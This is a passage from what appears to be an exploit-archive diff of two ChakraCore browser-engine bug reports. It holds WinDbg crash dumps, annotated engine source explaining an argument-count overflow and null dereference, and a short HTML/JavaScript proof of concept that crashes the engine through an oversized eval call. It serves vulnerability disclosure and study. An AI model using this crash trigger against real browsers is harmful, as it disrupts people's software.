00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
0:016> g
STATUS_STACK_BUFFER_OVERRUN encountered
(1590.b70): Break instruction exception - code 80000003 (first chance)
KERNELBASE!UnhandledExceptionFilter+0x85960:
00007ffe`9e61c120 cc int 3
0:016> kb
RetAddr : Args to Child : Call Site
00007ffe`811c726a : 00007ffe`814f2820 00007ffe`814f2820 000000d8`b83f9e70 000000d8`b83f9e70 : KERNELBASE!UnhandledExceptionFilter+0x85960
00007ffe`811c73f9 : 00007ffe`00000000 00007ffe`80f50000 00007ffe`8160e2f0 00007ffe`816c6ea4 : chakra!_raise_securityfailure+0x1a
00007ffe`811cac98 : 000100d8`fa7ddce2 00007ffe`a1eb92e2 00007ffe`8102aeac 000000d8`00000000 : chakra!_report_gsfailure+0x169
00007ffe`a1f4a08d : 00000000`00000000 000000d8`b83f8eb0 00000000`00000000 00000000`00000000 : chakra!_GSHandlerCheck_EH+0x38
00007ffe`a1eb9c58 : 00000000`00000000 00000000`00000000 000002aa`8312dc00 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xd
00007ffe`a1f4910e : 000002aa`8315fbc0 00007ffe`a1ec9f66 000002aa`98205cbb 000000d8`b83f9538 : ntdll!RtlDispatchException+0x368
00007ffe`8133ba8d : 000002aa`8312a270 000002aa`9820003d 000002aa`8312a270 00000000`00000000 : ntdll!KiUserExceptionDispatcher+0x2e
00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5
00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
-->
<html>
<head>
<title> POC </title>
</head>
<script>
var a = '0x42424242,'.repeat(0xFFFF-2);
var b = "function Car(){} var car = new Car(a,"+a+"a);";
eval(b);
</script>
</html>

419
platforms/windows/dos/42467.html Executable file
View file

@ -0,0 +1,419 @@
<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team
The issue could lead a nullptr derefrence besides a stack overflow we metioned previously.
// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
Js::ArgSlot EmitArgList(
ParseNode *pnode,
Js::RegSlot rhsLocation,
Js::RegSlot thisLocation,
Js::RegSlot newTargetLocation,
BOOL fIsEval,
BOOL fAssignRegs,
ByteCodeGenerator *byteCodeGenerator,
FuncInfo *funcInfo,
Js::ProfileId callSiteId,
uint16 spreadArgCount = 0,
Js::AuxArray<uint32> **spreadIndices = nullptr)
{
// This function emits the arguments for a call.
// ArgOut's with uses immediately following defs.
EmitArgListStart(thisLocation, byteCodeGenerator, funcInfo, callSiteId);
Js::RegSlot evalLocation = Js::Constants::NoRegister;
//
// If Emitting arguments for eval and assigning registers, get a tmpLocation for eval.
// This would be used while generating frameDisplay in EmitArgListEnd.
//
if (fIsEval)
{
evalLocation = funcInfo->AcquireTmpRegister();
}
if (spreadArgCount > 0) //spreadArgCount==0 because of overflow****
{
const size_t extraAlloc = spreadArgCount * sizeof(uint32);
Assert(spreadIndices != nullptr);
*spreadIndices = AnewPlus(byteCodeGenerator->GetAllocator(), extraAlloc, Js::AuxArray<uint32>, spreadArgCount); //skip initialization of spreadIndices****
}
size_t argIndex = EmitArgs(pnode, fAssignRegs, byteCodeGenerator, funcInfo, callSiteId, spreadIndices == nullptr ? nullptr : *spreadIndices);
Js::ArgSlot argumentsCount = EmitArgListEnd(pnode, rhsLocation, thisLocation, evalLocation, newTargetLocation, byteCodeGenerator, funcInfo, argIndex, callSiteId);
if (fIsEval)
{
funcInfo->ReleaseTmpRegister(evalLocation);
}
return argumentsCount;
}
// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
size_t EmitArgs(
ParseNode *pnode,
BOOL fAssignRegs,
ByteCodeGenerator *byteCodeGenerator,
FuncInfo *funcInfo,
Js::ProfileId callSiteId,
Js::AuxArray<uint32> *spreadIndices = nullptr
)
{
Js::ArgSlot argIndex = 0;
Js::ArgSlot spreadIndex = 0;
if (pnode != nullptr)
{
while (pnode->nop == knopList)
{
// If this is a put, the arguments have already been evaluated (see EmitReference).
// We just need to emit the ArgOut instructions.
if (fAssignRegs)
{
Emit(pnode->sxBin.pnode1, byteCodeGenerator, funcInfo, false);
}
if (pnode->sxBin.pnode1->nop == knopEllipsis)
{
Assert(spreadIndices != nullptr);
spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this' //nullptr derefrence****
EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->sxBin.pnode1->location, callSiteId, argIndex);
}
else
{
byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->sxBin.pnode1->location, callSiteId);
}
if (fAssignRegs)
{
funcInfo->ReleaseLoc(pnode->sxBin.pnode1);
}
pnode = pnode->sxBin.pnode2;
}
// If this is a put, the call target has already been evaluated (see EmitReference).
if (fAssignRegs)
{
Emit(pnode, byteCodeGenerator, funcInfo, false);
}
if (pnode->nop == knopEllipsis)
{
Assert(spreadIndices != nullptr);
spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this'
EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->location, callSiteId, argIndex);
}
else
{
byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->location, callSiteId);
}
if (fAssignRegs)
{
funcInfo->ReleaseLoc(pnode);
}
}
return argIndex;
}
Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
*** wait with pending attach
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00007ff6`56460000 00007ff6`56485000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ModLoad: 00007ffd`4cba0000 00007ffd`4cd7b000 C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffd`4ad90000 00007ffd`4ae3e000 C:\Windows\System32\KERNEL32.DLL
ModLoad: 00007ffd`49c00000 00007ffd`49e49000 C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`475e0000 00007ffd`4765e000 C:\Windows\SYSTEM32\apphelp.dll
ModLoad: 00007ffd`4a1a0000 00007ffd`4a499000 C:\Windows\System32\combase.dll
ModLoad: 00007ffd`499b0000 00007ffd`49aa6000 C:\Windows\System32\ucrtbase.dll
ModLoad: 00007ffd`4b250000 00007ffd`4b375000 C:\Windows\System32\RPCRT4.dll
ModLoad: 00007ffd`49eb0000 00007ffd`49f1a000 C:\Windows\System32\bcryptPrimitives.dll
ModLoad: 00007ffd`4a100000 00007ffd`4a19d000 C:\Windows\System32\msvcrt.dll
ModLoad: 00007ffd`43c40000 00007ffd`43ca0000 C:\Windows\SYSTEM32\wincorlib.DLL
ModLoad: 00007ffd`4b380000 00007ffd`4b440000 C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffd`49b60000 00007ffd`49bfa000 C:\Windows\System32\msvcp_win.dll
ModLoad: 00007ffd`490a0000 00007ffd`490b1000 C:\Windows\System32\kernel.appcore.dll
ModLoad: 00007ffd`2c870000 00007ffd`2cc34000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
ModLoad: 00007ffd`492b0000 00007ffd`499a2000 C:\Windows\System32\Windows.Storage.dll
ModLoad: 00007ffd`4b4f0000 00007ffd`4b591000 C:\Windows\System32\advapi32.dll
ModLoad: 00007ffd`4b1f0000 00007ffd`4b249000 C:\Windows\System32\sechost.dll
ModLoad: 00007ffd`4cb40000 00007ffd`4cb91000 C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffd`4a8e0000 00007ffd`4a907000 C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`49f20000 00007ffd`4a0a8000 C:\Windows\System32\gdi32full.dll
ModLoad: 00007ffd`4c9f0000 00007ffd`4cb3a000 C:\Windows\System32\USER32.dll
ModLoad: 00007ffd`41cb0000 00007ffd`41f36000 C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffd`490c0000 00007ffd`490de000 C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`4a9c0000 00007ffd`4aa6a000 C:\Windows\System32\shcore.dll
ModLoad: 00007ffd`49030000 00007ffd`4907c000 C:\Windows\System32\powrprof.dll
ModLoad: 00007ffd`49010000 00007ffd`49025000 C:\Windows\System32\profapi.dll
ModLoad: 00007ffd`48310000 00007ffd`48341000 C:\Windows\SYSTEM32\ntmarta.dll
ModLoad: 00007ffd`48f10000 00007ffd`48f39000 C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ffd`486a0000 00007ffd`48744000 C:\Windows\SYSTEM32\DNSAPI.dll
ModLoad: 00007ffd`4b030000 00007ffd`4b09c000 C:\Windows\System32\WS2_32.dll
ModLoad: 00007ffd`4a9b0000 00007ffd`4a9b8000 C:\Windows\System32\NSI.dll
ModLoad: 00007ffd`38c70000 00007ffd`38c96000 C:\Windows\SYSTEM32\clipc.dll
ModLoad: 00007ffd`48a60000 00007ffd`48a77000 C:\Windows\SYSTEM32\cryptsp.dll
ModLoad: 00007ffd`4b4a0000 00007ffd`4b4cd000 C:\Windows\System32\IMM32.DLL
ModLoad: 00007ffd`48660000 00007ffd`48697000 C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffd`479c0000 00007ffd`47b30000 C:\Windows\SYSTEM32\twinapi.appcore.dll
ModLoad: 00007ffd`48ee0000 00007ffd`48f05000 C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffd`48140000 00007ffd`48161000 C:\Windows\SYSTEM32\profext.dll
ModLoad: 00007ffd`38a20000 00007ffd`38a94000 C:\Windows\SYSTEM32\msiso.dll
ModLoad: 00007ffd`3e660000 00007ffd`3e682000 C:\Windows\SYSTEM32\EShims.dll
ModLoad: 00007ffd`3d710000 00007ffd`3d72b000 C:\Windows\SYSTEM32\MPR.dll
ModLoad: 00007ffd`4b0a0000 00007ffd`4b1e5000 C:\Windows\System32\ole32.dll
ModLoad: 00007ffd`47830000 00007ffd`478c5000 C:\Windows\system32\uxtheme.dll
ModLoad: 00007ffd`379c0000 00007ffd`37a61000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 00007ffd`2df90000 00007ffd`2f641000 C:\Windows\SYSTEM32\edgehtml.dll
ModLoad: 00007ffd`2d730000 00007ffd`2df1b000 C:\Windows\SYSTEM32\chakra.dll
ModLoad: 00007ffd`45500000 00007ffd`45639000 C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ffd`3e0a0000 00007ffd`3e0df000 C:\Windows\SYSTEM32\MLANG.dll
ModLoad: 00007ffd`45c20000 00007ffd`45c96000 C:\Windows\SYSTEM32\policymanager.dll
ModLoad: 00007ffd`45b90000 00007ffd`45c1f000 C:\Windows\SYSTEM32\msvcp110_win.dll
ModLoad: 00007ffd`45fb0000 00007ffd`46146000 C:\Windows\SYSTEM32\PROPSYS.dll
ModLoad: 00007ffd`39b50000 00007ffd`39c1b000 C:\Windows\System32\ieproxy.dll
ModLoad: 00007ffd`436b0000 00007ffd`437b6000 C:\Windows\System32\Windows.UI.dll
ModLoad: 00007ffd`435e0000 00007ffd`43662000 C:\Windows\SYSTEM32\TextInputFramework.dll
ModLoad: 00007ffd`46eb0000 00007ffd`46f93000 C:\Windows\SYSTEM32\CoreMessaging.dll
ModLoad: 00007ffd`44b90000 00007ffd`44e62000 C:\Windows\SYSTEM32\CoreUIComponents.dll
ModLoad: 00007ffd`45b70000 00007ffd`45b85000 C:\Windows\SYSTEM32\usermgrcli.dll
ModLoad: 00007ffd`44040000 00007ffd`44571000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
ModLoad: 00007ffd`4b5a0000 00007ffd`4c9d7000 C:\Windows\System32\shell32.dll
ModLoad: 00007ffd`4a0b0000 00007ffd`4a0f9000 C:\Windows\System32\cfgmgr32.dll
ModLoad: 00007ffd`46150000 00007ffd`4617a000 C:\Windows\SYSTEM32\dwmapi.dll
ModLoad: 00007ffd`39200000 00007ffd`3952e000 C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffd`4ac20000 00007ffd`4ad86000 C:\Windows\System32\msctf.dll
ModLoad: 00007ffd`48f40000 00007ffd`48f70000 C:\Windows\SYSTEM32\SspiCli.dll
ModLoad: 00007ffd`43860000 00007ffd`43962000 C:\Windows\SYSTEM32\mrmcorer.dll
ModLoad: 00007ffd`36760000 00007ffd`36770000 C:\Windows\SYSTEM32\tokenbinding.dll
ModLoad: 00007ffd`43ba0000 00007ffd`43c09000 C:\Windows\SYSTEM32\Bcp47Langs.dll
ModLoad: 00007ffd`396b0000 00007ffd`396cb000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
ModLoad: 00007ffd`400d0000 00007ffd`401a7000 C:\Windows\SYSTEM32\winhttp.dll
ModLoad: 00007ffd`488c0000 00007ffd`4891c000 C:\Windows\system32\mswsock.dll
ModLoad: 00007ffd`42450000 00007ffd`4245b000 C:\Windows\SYSTEM32\WINNSI.DLL
ModLoad: 00007ffd`41940000 00007ffd`41b08000 C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffd`48a80000 00007ffd`48a8b000 C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ffd`36f20000 00007ffd`36f3a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
ModLoad: 00007ffd`38ae0000 00007ffd`38c6a000 C:\Windows\SYSTEM32\ieapfltr.dll
ModLoad: 00007ffd`47670000 00007ffd`4768d000 C:\Windows\System32\rmclient.dll
ModLoad: 00007ffd`34410000 00007ffd`34457000 C:\Windows\system32\dataexchange.dll
ModLoad: 00007ffd`46fa0000 00007ffd`470c2000 C:\Windows\SYSTEM32\dcomp.dll
ModLoad: 00007ffd`46620000 00007ffd`468ff000 C:\Windows\SYSTEM32\d3d11.dll
ModLoad: 00007ffd`47e80000 00007ffd`47f24000 C:\Windows\SYSTEM32\dxgi.dll
ModLoad: 00007ffd`35bb0000 00007ffd`35bc8000 C:\Windows\System32\UiaManager.dll
ModLoad: 00007ffd`37e60000 00007ffd`37ee2000 C:\Windows\system32\twinapi.dll
ModLoad: 00007ffd`2d700000 00007ffd`2d728000 C:\Windows\SYSTEM32\srpapi.dll
ModLoad: 00007ffd`490e0000 00007ffd`492a9000 C:\Windows\System32\CRYPT32.dll
ModLoad: 00007ffd`49080000 00007ffd`49091000 C:\Windows\System32\MSASN1.dll
ModLoad: 00007ffd`30870000 00007ffd`308ea000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
ModLoad: 00007ffd`385b0000 00007ffd`3860d000 C:\Windows\SYSTEM32\ninput.dll
ModLoad: 00007ffd`46900000 00007ffd`46ea4000 C:\Windows\SYSTEM32\d2d1.dll
ModLoad: 00007ffd`40390000 00007ffd`4064f000 C:\Windows\SYSTEM32\DWrite.dll
ModLoad: 00007ffd`30470000 00007ffd`304ca000 C:\Windows\System32\Windows.Graphics.dll
ModLoad: 00007ffd`2d6f0000 00007ffd`2d6ff000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
ModLoad: 00007ffd`448a0000 00007ffd`448e2000 C:\Windows\SYSTEM32\vm3dum64.dll
ModLoad: 00007ffd`44680000 00007ffd`446e7000 C:\Windows\SYSTEM32\D3D10Level9.dll
ModLoad: 00007ffd`37780000 00007ffd`377eb000 C:\Windows\System32\oleacc.dll
ModLoad: 00007ffd`2d6e0000 00007ffd`2d6f0000 C:\Windows\system32\msimtf.dll
ModLoad: 00007ffd`40030000 00007ffd`400b8000 C:\Windows\system32\directmanipulation.dll
ModLoad: 00007ffd`39af0000 00007ffd`39b04000 C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
ModLoad: 00007ffd`3f270000 00007ffd`3f2a8000 C:\Windows\System32\smartscreenps.dll
ModLoad: 00007ffd`377f0000 00007ffd`379b5000 C:\Windows\System32\uiautomationcore.dll
ModLoad: 00007ffd`40200000 00007ffd`40388000 C:\Windows\SYSTEM32\windows.globalization.dll
(18bc.14e0): Access violation - code c0000005 (!!! second chance !!!)
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504 mov dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=????????
0:016> r
rax=0000000000000000 rbx=0000006a8f7faeb0 rcx=0000000000000001
rdx=0000019df75e3040 rsi=0000000000000002 rdi=0000006a8f7fa9c0
rip=00007ffd2da3132f rsp=0000006a8f7fb0f0 rbp=0000006a8f7fb8f0
r8=0000000000000000 r9=0000000000000000 r10=0000000000000009
r11=0000019df75ff04d r12=0000000000000001 r13=0000000000000000
r14=0000006a8f7fb8f0 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504 mov dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=????????
0:016> ub
chakra!EmitArgListEnd+0xdde2c:
00007ffd`2da3130c 0f856022f2ff jne chakra!EmitArgListEnd+0x92 (00007ffd`2d953572)
00007ffd`2da31312 0fb7c6 movzx eax,si
00007ffd`2da31315 e95b22f2ff jmp chakra!EmitArgListEnd+0x95 (00007ffd`2d953575)
00007ffd`2da3131a 410fb7c4 movzx eax,r12w
00007ffd`2da3131e 664403e2 add r12w,dx
00007ffd`2da31322 0fb7cf movzx ecx,di
00007ffd`2da31325 03ca add ecx,edx
00007ffd`2da31327 488b942498000000 mov rdx,qword ptr [rsp+98h]
0:016> u
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504 mov dword ptr [r13+rax*4+4],ecx
00007ffd`2da31334 488d4c2440 lea rcx,[rsp+40h]
00007ffd`2da31339 488b4328 mov rax,qword ptr [rbx+28h]
00007ffd`2da3133d 48894c2420 mov qword ptr [rsp+20h],rcx
00007ffd`2da31342 488bcd mov rcx,rbp
00007ffd`2da31345 448b400c mov r8d,dword ptr [rax+0Ch]
00007ffd`2da31349 e8229c2300 call chakra!EmitSpreadArgToListBytecodeInstr (00007ffd`2dc6af70)
00007ffd`2da3134e 0fb77c2440 movzx edi,word ptr [rsp+40h]
0:016> kb
RetAddr : Args to Child : Call Site
00007ffd`2d953484 : 0000019d`f64e8aa0 00007ffd`00000001 0000006a`8f7fb8f0 0000019d`f75e3040 : chakra!EmitArgs+0xddda3
